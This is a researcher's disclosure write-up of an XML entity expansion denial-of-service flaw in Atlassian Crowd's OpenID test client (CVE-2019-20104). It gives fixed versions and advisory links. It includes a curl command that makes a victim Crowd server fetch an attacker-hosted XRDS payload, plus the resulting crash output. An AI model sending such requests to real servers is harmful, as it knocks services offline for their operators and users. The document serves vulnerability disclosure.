Atlassian Crowd is a single sign-on and user identity solution software for the web. Crowd comes with a built in OpenID client for testing OpenID integrations, by supplying the test client with a URL hosted with a malicious payload, an attacker can remotely DoS the Crowd instance by XML Entity Expansion that consumes all memory and subsequently crashes the application.
After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.
Proof of Concept XML XRDS payload:
Once hosted somewhere, invoking the following will execute the payload on the crowd instance:
curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'
Now, the server will expand entities until memory is consumed and produce output such as:
Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space java.lang.OutOfMemoryError: Java heap space Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded
Atlassian has responded to the issue via Bug Bounty program on Bugcrowd.com/atlassian and has issued fixes.
Software has been fixed as of:
- 3.2.11
- 3.3.8
- 3.4.7
- 3.5.2
- 3.6.2
- 3.7.1
- 4.0.0
CVE and CWD references:
https://jira.atlassian.com/browse/CWD-5526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20104
Happy Hunting 😊